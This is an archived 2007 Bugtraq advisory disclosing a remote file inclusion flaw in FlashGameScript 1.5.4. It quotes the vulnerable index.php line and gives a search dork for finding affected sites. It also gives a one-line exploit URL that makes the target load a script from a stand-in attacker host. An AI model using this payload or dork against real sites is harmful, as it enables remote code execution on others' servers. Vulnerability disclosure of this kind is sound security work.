[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

FlashGameScript v1.5.4 Remote File Inclusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: FlashGameScript v1.5.4 Remote File Inclusion Vulnerability
From: malic89@xxxxxxxxx
Date: 21 Feb 2007 13:26:59 -0000

--------------------------------------------------------
Author          : JuMp-Er
Date            : feb, 21th 2007
Level           : Dangerous
contact:        : aH-crew[at]hotmail[dot]com
--------------------------------------------------------


Software description
--------------------------------------------------------
App             :FlashGameScript
Version         :1.5.4
URL             :http://www.flashgamescript.com/
Dork            :Copyright © 2006-2007 Powered by FlashGameScript.com version 
1.5 All Rights Reserved 
Price:          :$60
Description :
Flash Game Script is the latest arcade website script created by developers at 
ghoney.com and will be market by folks at FlashGameScript.com.
Our game site script is created to maximized arcade site owner?s profit with 
additional plug-in for alternative income opportunities.
-------------------------------------------------------


Vulnerability:
---------------
        
at index.php line 28: $func =$_GET[func];
---------------
Exploit:

http://www.target.com/index.php?func=http://attacker.com/evil_script?

---------------

Greetz to all members of active. Hacking Crew

Prev by Date: Re: Firefox: about:blank is phisher's best friend
Next by Date: Re: Firefox: about:blank is phisher's best friend
Previous by thread: WebSpell > 4.0 Authentication Bypass and arbitrary code execution
Next by thread: Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit
Index(es):
- Date
- Thread